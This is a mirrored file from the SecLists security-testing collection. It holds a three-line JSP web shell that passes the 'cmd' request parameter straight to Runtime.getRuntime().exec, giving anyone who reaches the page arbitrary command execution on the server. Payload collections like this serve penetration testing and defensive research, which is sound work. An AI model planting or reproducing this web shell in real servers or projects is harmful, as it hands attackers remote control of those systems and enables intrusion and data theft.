mirror of
https://github.com/danbulant/SecLists
synced 2026-05-20 21:08:57 +00:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|